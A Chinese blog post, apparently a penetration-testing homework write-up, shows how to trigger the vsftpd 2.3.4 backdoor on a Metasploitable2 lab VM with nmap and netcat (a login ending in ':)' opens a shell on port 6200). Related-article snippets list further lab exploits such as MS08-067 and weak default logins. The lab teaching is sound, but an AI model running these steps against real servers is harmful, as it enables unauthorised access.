漏洞靶机渗透

最新推荐文章于 2024-04-24 22:43:45 发布
最新推荐文章于 2024-04-24 22:43:45 发布
阅读量2.7k 收藏 1
点赞数
分类专栏: 网络渗透测试作业 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51690722/article/details/121167947
版权

今天我们来讲解如何进行漏洞的靶机渗透

1.首选我们得下一下Metasploitable这个文件,去官网找就行

2.下完了之后我们是这个文件夹

 3.直接打开Metasploitable虚拟机文件,并打开kali虚拟机

4.然后进到这个界面

 5.首先我们进入Metasploitable需要输入账号密码,账号密码都是msfadmin

6.然后我们要ping出靶机的ip地址,需要使用的命令是:ifconfig

现在我们可以看到ip地址是192.168.52.131

7.ping出ip地址之后我们返回kali虚拟机,在那里进行操作。

使用命令nmap ip可得到哪个端口开放

 可以看出21端口是开放状态

8.然后我们查看一下6200端口是否为开放状态,运用命令:nmap -p 6200 ip

 

 由图可知,6200端口处于closed关闭状态。

9.然后我们需要连接到21端口,在那里使用命令:nc ip 21

然后逐个输入user a:)

pass+随便几个数字

 

10.此时我们再用上面第8小点的命令:nmap -p 6200 ip 来进行检查6200端口,我们发现经过我们的操作,6200端口已经被打开了

 11.此时我们再用命令:nc ip 6200来进行靶机的渗透,大概最后结果会是这样子的

这样我们的渗透工作差不多就完成了。 

 

摆烂王子Z
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[渗透测试靶机10] vulnhub靶场 BULLDOG_ 1
weixin_47112073的博客
11-13 176
这个靶机难度较为简单,可以简单练手
Kali渗透测试-远程控制:6200端口变成“后门”
Liu_Bruce的博客
05-06 3011
Kali渗透测试-远程控制:6200端口变成“后门” 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:Metasploitable2 - Linux (IP:192.168.68.205) 攻击工具:Netcat(nc) “瑞士军刀” 扫描工具:Nmap version 7.92 漏洞是黑客进入计算机的入口,如果目标主机上运行的vsftpd-2.3.4被黑客使用笑脸漏洞成功渗透,就会自动在6200
008 - VulnHub靶机:pWnOS2.0 学习笔记 —— PHP CMS漏洞利用+文件上传+Mysql+渗透测试思路
最新发布
Windmill_的博客
04-24 1316
pWnOS2.0 靶机学习笔记,思路和过程及其详细。
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 3913
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
qq_50854662的博客
05-16 5831
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利
渗透测试-漏洞靶机
weixin_46162146的博客
01-15 5050
0X01 sqli-labs sqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用 下载地址:https://github.com/Audi-1/sqli-labs 0X02 xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用 下载地址:http://xss-quiz.int21h...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC3靶机渗透测试练习
10-05
因此,在 DC3靶机渗透测试练习中,我们需要扫描 Joomla 框架的漏洞,以便于发现潜在的漏洞和弱点。 在 Joomla 框架漏洞扫描阶段,我们使用了 joomscan 工具来扫描 Joomla 版本,发现潜在的漏洞和弱点。joomscan 是...
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
vulhub漏洞测试靶场
08-16
vulhub-master.zip
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
靶机漏洞报告.pdf
10-12
该文档 主要是针对靶机做的渗透测试报告,用的扫描工具是OpenVas
漏洞靶场搭建
nejore的博客
06-08 948
vulhub基础环境搭建
metasploitable2渗透测试
qq_57976347的博客
06-06 1186
一、系统弱密码登录 1、在kali上执行命令行telnet 192.168.26.129 2、Login和password都输入msfadmin 3、登录成功,进入系统 4、测试如下: 二、MySQL弱密码登录: 1、在kali上执行mysql –h 192.168.26.129 –u root 2、登录成功,进入MySQL系统 3、测试效果: 三、PostgreSQL弱密码登录 1、在Kali上执行psql -h 192.168.26.129 –U post...
网络安全实战:记一次比较完整的靶机渗透
2301_76694151的博客
05-13 136
访问80端口的http服务只发现了一个域名。
靶场攻略 | 网络安全靶场合集
Python_0011的博客
10-11 3275
1JAVA环境。
Vulhub搭建漏洞靶机环境
baidu_38844729的博客
11-03 2623
前期准备 在kali中安装好docker环境并启动服务 正式安装 安装compose pip install docker-compose 下载Vulhub环境 下载地址:https://github.com/vulhub/vulhub/archive/master.zip 下载之后先解压,然后再使用FileZilla传输到kali上 更换镜像源 国内访问官方的docker镜像源非常缓...
漏洞payload 靶机_自主学习1 Metasploit的简单使用 (ms08-067漏洞利用)
weixin_39655981的博客
12-12 250
大家好啊,初次见面,对于一个安全小白来说,想通过这样的方式整理自己的思路并且和你们交流,还请各位大佬,同白多多指教,话不多说让我们开始这有趣的东西吧!!简介kali linux :一个集成了许多攻击工具的操做系统(可以把它想象成为一个武器库,它本只是管理武器,而不是武器)windows xp:这不用我多介绍了吧metasploit一个比较好用的漏洞利用(核心功能)工具,更准确的说法说它是一个渗透框...
billu_b0x[靶机]
weixin_43736033的博客
03-14 668
主机发现: 主机探测: 访问80端口 利用sqlmap 跑了一下post 无果 用dirb爆破目录 访问in.php 找到配置文件路径 尝试过这个文件上传,没用 有点像文件包含 尝试payload : http://192.168.222.135/test.php?file=test.php 没有用 用bp抓包切换成post方式 发现文件包含 利用文件包含读取 c.php时发现 ...
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值